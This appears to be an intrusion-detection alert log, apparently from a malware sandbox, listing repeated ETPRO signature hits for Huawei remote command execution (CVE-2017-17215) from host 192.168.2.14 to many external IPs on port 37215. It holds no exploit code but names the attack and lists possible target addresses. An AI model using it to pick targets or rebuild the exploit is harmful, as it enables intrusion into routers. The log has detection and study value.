                                                        06/13/24-21:33:05.016178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4416237215192.168.2.1441.191.217.18
                                                        06/13/24-21:32:50.612356TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5110037215192.168.2.14156.183.134.248
                                                        06/13/24-21:32:07.417987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4785837215192.168.2.1441.218.188.114
                                                        06/13/24-21:33:17.306007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4194237215192.168.2.14197.99.51.83
                                                        06/13/24-21:32:07.418018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4381437215192.168.2.14197.91.179.222
                                                        06/13/24-21:32:21.786622TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4285037215192.168.2.14197.162.77.156
                                                        06/13/24-21:33:17.339777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4155637215192.168.2.14197.58.230.135
                                                        06/13/24-21:32:07.401827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4846237215192.168.2.1441.124.106.15
                                                        06/13/24-21:32:30.097254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5063637215192.168.2.1441.46.178.72
                                                        06/13/24-21:32:40.358306TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3388637215192.168.2.1441.98.82.146
                                                        06/13/24-21:32:13.544981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5279637215192.168.2.14197.147.57.213
                                                        06/13/24-21:32:44.474990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3764437215192.168.2.14156.59.133.129
                                                        06/13/24-21:32:01.239008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4666437215192.168.2.14156.181.3.63
                                                        06/13/24-21:32:05.376655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6018637215192.168.2.14156.150.212.127
                                                        06/13/24-21:33:17.306960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5209637215192.168.2.1441.199.244.100
                                                        06/13/24-21:32:25.991541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3772837215192.168.2.14197.187.184.119
                                                        06/13/24-21:32:46.502060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6095237215192.168.2.14156.134.63.168
                                                        06/13/24-21:33:09.130285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3353237215192.168.2.14156.144.48.121
                                                        06/13/24-21:32:25.973300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4684437215192.168.2.14197.207.185.118
                                                        06/13/24-21:32:09.455690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3567237215192.168.2.14156.185.233.106
                                                        06/13/24-21:32:07.400751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4198437215192.168.2.14156.239.199.188
                                                        06/13/24-21:32:40.355006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3994837215192.168.2.14197.89.6.82
                                                        06/13/24-21:32:01.223387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3654437215192.168.2.14156.230.229.98
                                                        06/13/24-21:32:36.243859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4527637215192.168.2.14156.255.197.202
                                                        06/13/24-21:32:03.278439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3458637215192.168.2.14197.212.212.239
                                                        06/13/24-21:33:15.259115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5289237215192.168.2.14197.59.12.120
                                                        06/13/24-21:32:13.546795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5138437215192.168.2.14156.166.77.195
                                                        06/13/24-21:32:32.169110TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3573637215192.168.2.14156.205.135.220
                                                        06/13/24-21:32:44.453377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5771037215192.168.2.14156.89.2.18
                                                        06/13/24-21:31:59.174908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5813037215192.168.2.14197.8.72.118
                                                        06/13/24-21:32:15.631109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4491437215192.168.2.14156.73.250.206
                                                        06/13/24-21:32:54.726111TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3298237215192.168.2.1441.143.118.198
                                                        06/13/24-21:32:44.477088TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3452237215192.168.2.14156.161.100.127
                                                        06/13/24-21:33:02.909644TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5086637215192.168.2.14156.216.132.209
                                                        06/13/24-21:32:56.756839TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5994437215192.168.2.1441.194.143.73
                                                        06/13/24-21:33:09.090814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4968237215192.168.2.14156.250.226.112
                                                        06/13/24-21:32:50.629808TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4243237215192.168.2.14197.32.27.251
                                                        06/13/24-21:33:00.888854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6023437215192.168.2.1441.48.5.125
                                                        06/13/24-21:32:19.750800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5446837215192.168.2.14156.63.67.245
                                                        06/13/24-21:32:32.170254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4799637215192.168.2.14197.120.127.248
                                                        06/13/24-21:32:52.655786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4939837215192.168.2.14156.153.75.59
                                                        06/13/24-21:32:09.439336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4931637215192.168.2.14156.164.171.191
                                                        06/13/24-21:32:13.569230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5130237215192.168.2.14197.113.102.11
                                                        06/13/24-21:32:01.240734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4677237215192.168.2.14197.8.66.15
                                                        06/13/24-21:32:30.125786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5096437215192.168.2.14156.209.87.51
                                                        06/13/24-21:33:07.042279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5849637215192.168.2.1441.1.168.172
                                                        06/13/24-21:32:36.242927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4499637215192.168.2.14156.54.178.96
                                                        06/13/24-21:32:01.248651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5852437215192.168.2.14197.45.206.41
                                                        06/13/24-21:32:03.278401TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4000037215192.168.2.14197.146.168.47
                                                        06/13/24-21:32:30.079333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4952437215192.168.2.14156.103.250.176
                                                        06/13/24-21:32:30.079032TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5552837215192.168.2.14156.148.108.223
                                                        06/13/24-21:31:59.197474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3398837215192.168.2.14156.141.134.112
                                                        06/13/24-21:32:13.544659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5354637215192.168.2.14156.250.91.175
                                                        06/13/24-21:32:58.840920TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4113437215192.168.2.14197.168.244.26
                                                        06/13/24-21:31:57.136448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5709837215192.168.2.14156.102.232.222
                                                        06/13/24-21:32:28.028153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3603237215192.168.2.14197.110.122.36
                                                        06/13/24-21:33:00.888792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6035237215192.168.2.1441.152.230.141
                                                        06/13/24-21:32:13.545930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4596637215192.168.2.14197.45.244.46
                                                        06/13/24-21:32:56.785659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4407437215192.168.2.1441.209.143.246
                                                        06/13/24-21:32:19.729537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5632837215192.168.2.1441.75.29.253
                                                        06/13/24-21:33:15.256231TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5258837215192.168.2.1441.113.46.137
                                                        06/13/24-21:32:32.152371TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4426637215192.168.2.1441.119.64.227
                                                        06/13/24-21:32:15.638689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3515237215192.168.2.14156.229.149.91
                                                        06/13/24-21:31:57.134406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3348037215192.168.2.14156.81.17.31
                                                        06/13/24-21:33:04.990572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4540237215192.168.2.14156.30.147.12
                                                        06/13/24-21:32:07.403166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3945437215192.168.2.14197.21.99.138
                                                        06/13/24-21:33:02.913519TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3482837215192.168.2.14156.30.49.22
                                                        06/13/24-21:32:07.417839TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3578437215192.168.2.14197.98.83.205
                                                        06/13/24-21:32:21.805017TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4443037215192.168.2.14156.199.229.223
                                                        06/13/24-21:32:32.168478TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3543637215192.168.2.14197.200.115.62
                                                        06/13/24-21:32:50.610755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5296037215192.168.2.1441.143.206.228
                                                        06/13/24-21:32:56.755837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4952037215192.168.2.14197.45.158.177
                                                        06/13/24-21:32:34.192769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5450037215192.168.2.14197.80.39.203
                                                        06/13/24-21:33:09.107689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4702037215192.168.2.1441.217.249.151
                                                        06/13/24-21:32:28.026363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5360837215192.168.2.1441.33.21.160
                                                        06/13/24-21:32:32.167053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3957237215192.168.2.14156.97.5.214
                                                        06/13/24-21:33:02.912576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5904837215192.168.2.1441.108.217.86
                                                        06/13/24-21:33:17.341153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3481437215192.168.2.1441.171.152.158
                                                        06/13/24-21:33:15.257515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5155237215192.168.2.14197.157.178.49
                                                        06/13/24-21:32:07.420167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5198437215192.168.2.14197.94.170.23
                                                        06/13/24-21:31:57.092009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4893237215192.168.2.1441.128.35.59
                                                        06/13/24-21:33:00.886210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3983637215192.168.2.14156.52.221.13
                                                        06/13/24-21:32:03.299353TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5596637215192.168.2.1441.193.199.134
                                                        06/13/24-21:32:42.403743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4262437215192.168.2.14156.212.72.3
                                                        06/13/24-21:32:58.824867TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4018037215192.168.2.1441.99.214.229
                                                        06/13/24-21:32:42.418571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3701837215192.168.2.14156.117.203.50
                                                        06/13/24-21:32:46.509285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6020037215192.168.2.1441.10.50.23
                                                        06/13/24-21:33:02.913553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5959837215192.168.2.1441.181.189.134
                                                        06/13/24-21:32:03.275209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3463037215192.168.2.14197.125.218.39
                                                        06/13/24-21:32:25.977517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4615237215192.168.2.14156.130.189.163
                                                        06/13/24-21:32:13.544831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5189837215192.168.2.1441.214.5.141
                                                        06/13/24-21:32:58.840166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4735837215192.168.2.14156.205.249.71
                                                        06/13/24-21:32:03.301401TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5313037215192.168.2.14197.19.0.15
                                                        06/13/24-21:33:13.227741TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3820037215192.168.2.14197.62.137.42
                                                        06/13/24-21:32:11.487221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4745637215192.168.2.14156.91.153.8
                                                        06/13/24-21:32:01.222481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4717037215192.168.2.14197.102.59.48
                                                        06/13/24-21:32:38.303553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5412037215192.168.2.14197.149.233.109
                                                        06/13/24-21:33:11.173222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5783837215192.168.2.1441.15.229.28
                                                        06/13/24-21:32:25.996608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4197637215192.168.2.14156.97.18.226
                                                        06/13/24-21:32:32.154370TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5157637215192.168.2.1441.60.53.62
                                                        06/13/24-21:32:54.725613TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5314637215192.168.2.14156.131.149.176
                                                        06/13/24-21:32:42.417880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3951837215192.168.2.1441.98.198.237
                                                        06/13/24-21:32:01.221764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4021837215192.168.2.1441.170.153.182
                                                        06/13/24-21:33:04.988290TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4730837215192.168.2.14156.172.226.255
                                                        06/13/24-21:33:11.155239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5993237215192.168.2.1441.232.149.18
                                                        06/13/24-21:32:05.377580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4762837215192.168.2.14156.160.173.116
                                                        06/13/24-21:33:05.011500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3969437215192.168.2.14156.233.113.160
                                                        06/13/24-21:32:13.547389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3506237215192.168.2.1441.182.58.102
                                                        06/13/24-21:32:38.297522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4867837215192.168.2.1441.159.199.154
                                                        06/13/24-21:32:40.354202TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4786637215192.168.2.1441.207.218.140
                                                        06/13/24-21:32:28.048588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5130237215192.168.2.1441.12.45.88
                                                        06/13/24-21:33:15.273017TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3518037215192.168.2.1441.91.157.219
                                                        06/13/24-21:32:07.420249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5434837215192.168.2.14156.93.190.196
                                                        06/13/24-21:32:42.422110TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4023637215192.168.2.14156.18.185.110
                                                        06/13/24-21:32:21.779948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5912837215192.168.2.1441.152.82.64
                                                        06/13/24-21:32:15.610400TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5874837215192.168.2.14156.64.236.190
                                                        06/13/24-21:32:23.837060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5407637215192.168.2.1441.154.140.203
                                                        06/13/24-21:31:57.093149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3761837215192.168.2.14197.150.96.223
                                                        06/13/24-21:33:07.039415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3954237215192.168.2.14156.140.107.52
                                                        06/13/24-21:33:11.157894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4608437215192.168.2.14156.22.150.91
                                                        06/13/24-21:32:19.729967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4002437215192.168.2.14156.71.201.215
                                                        06/13/24-21:32:19.727350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3752837215192.168.2.14197.167.114.215
                                                        06/13/24-21:33:15.258135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4169037215192.168.2.14156.66.169.160
                                                        06/13/24-21:33:04.987596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5084037215192.168.2.1441.238.160.57
                                                        06/13/24-21:33:07.039833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4326037215192.168.2.14197.199.81.2
                                                        06/13/24-21:33:04.990705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5201237215192.168.2.14197.189.172.26
                                                        06/13/24-21:32:25.996387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5258237215192.168.2.14197.27.108.95
                                                        06/13/24-21:33:04.989207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5955237215192.168.2.1441.26.33.9
                                                        06/13/24-21:32:28.044542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4012437215192.168.2.14156.25.53.107
                                                        06/13/24-21:32:42.424922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3911837215192.168.2.14156.13.87.2
                                                        06/13/24-21:33:05.012842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4886637215192.168.2.1441.227.222.95
                                                        06/13/24-21:32:58.843657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3812037215192.168.2.14197.137.205.225
                                                        06/13/24-21:32:19.752181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5108037215192.168.2.1441.133.97.107
                                                        06/13/24-21:32:03.273604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3660437215192.168.2.14197.242.2.51
                                                        06/13/24-21:33:09.128500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5544837215192.168.2.14197.130.49.142
                                                        06/13/24-21:32:15.638360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4652637215192.168.2.1441.10.161.159
                                                        06/13/24-21:32:15.611302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4249237215192.168.2.14197.17.69.27
                                                        06/13/24-21:32:23.837182TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3769837215192.168.2.14197.242.91.91
                                                        06/13/24-21:33:00.869275TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5935237215192.168.2.14156.109.225.205
                                                        06/13/24-21:32:13.545672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5123837215192.168.2.1441.96.24.6
                                                        06/13/24-21:32:17.676697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4476837215192.168.2.14197.198.118.207
                                                        06/13/24-21:32:56.754929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4947237215192.168.2.1441.207.124.48
                                                        06/13/24-21:32:30.078397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4484837215192.168.2.14156.251.173.70
                                                        06/13/24-21:33:02.954026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3678437215192.168.2.14197.78.157.180
                                                        06/13/24-21:32:09.455794TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5891637215192.168.2.14197.76.152.84
                                                        06/13/24-21:32:09.440920TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4063237215192.168.2.14156.110.173.138
                                                        06/13/24-21:31:57.133278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4291837215192.168.2.1441.162.16.194
                                                        06/13/24-21:32:58.824686TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3470037215192.168.2.14156.233.112.62
                                                        06/13/24-21:32:11.487537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3977837215192.168.2.1441.36.166.239
                                                        06/13/24-21:32:03.278055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3690637215192.168.2.14156.184.236.36
                                                        06/13/24-21:32:03.307444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3942837215192.168.2.14156.19.253.155
                                                        06/13/24-21:32:07.416500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4915837215192.168.2.14197.2.5.136
                                                        06/13/24-21:32:25.970017TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6067637215192.168.2.14156.9.153.222
                                                        06/13/24-21:32:36.244209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5794837215192.168.2.14197.1.132.63
                                                        06/13/24-21:33:11.160449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5658237215192.168.2.14197.212.164.101
                                                        06/13/24-21:32:23.831522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5529237215192.168.2.14197.190.55.11
                                                        06/13/24-21:32:48.573154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4299837215192.168.2.1441.228.20.243
                                                        06/13/24-21:32:01.224988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3538037215192.168.2.14156.250.165.250
                                                        06/13/24-21:32:32.165891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4284837215192.168.2.1441.129.192.141
                                                        06/13/24-21:32:07.404622TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3432437215192.168.2.14197.254.172.38
                                                        06/13/24-21:31:59.198142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4264237215192.168.2.1441.2.128.246
                                                        06/13/24-21:32:30.075630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4560637215192.168.2.1441.158.142.37
                                                        06/13/24-21:32:05.347597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5470637215192.168.2.14156.188.15.134
                                                        06/13/24-21:32:30.078233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4082637215192.168.2.14197.68.7.219
                                                        06/13/24-21:33:15.259041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6052237215192.168.2.14156.168.204.203
                                                        06/13/24-21:32:25.995541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3364837215192.168.2.14156.49.122.211
                                                        06/13/24-21:33:09.125842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4673437215192.168.2.14197.224.208.232
                                                        06/13/24-21:32:17.670934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5172237215192.168.2.1441.162.28.40
                                                        06/13/24-21:32:40.375235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6038437215192.168.2.14197.180.233.62
                                                        06/13/24-21:33:15.252987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3733237215192.168.2.14156.81.76.80
                                                        06/13/24-21:32:13.567790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3356837215192.168.2.14197.207.202.230
                                                        06/13/24-21:32:42.418982TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4966237215192.168.2.14156.135.0.36
                                                        06/13/24-21:32:52.657453TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5454237215192.168.2.14197.117.10.136
                                                        06/13/24-21:32:48.553324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5256237215192.168.2.1441.76.235.210
                                                        06/13/24-21:32:25.972802TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4280237215192.168.2.14197.239.237.116
                                                        06/13/24-21:32:23.944072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5584437215192.168.2.14156.47.77.218
                                                        06/13/24-21:33:13.227491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3392837215192.168.2.14197.87.160.249
                                                        06/13/24-21:32:48.554015TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5383437215192.168.2.14197.128.241.238
                                                        06/13/24-21:32:01.241838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3898037215192.168.2.14156.205.169.35
                                                        06/13/24-21:32:17.678109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4048437215192.168.2.14156.153.203.66
                                                        06/13/24-21:33:17.310604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4822437215192.168.2.14156.100.175.11
                                                        06/13/24-21:32:44.453829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4599237215192.168.2.14197.120.70.7
                                                        06/13/24-21:32:46.527715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5480037215192.168.2.1441.237.217.194
                                                        06/13/24-21:31:59.195706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3743837215192.168.2.14197.218.101.123
                                                        06/13/24-21:32:09.456861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4229437215192.168.2.14197.254.59.131
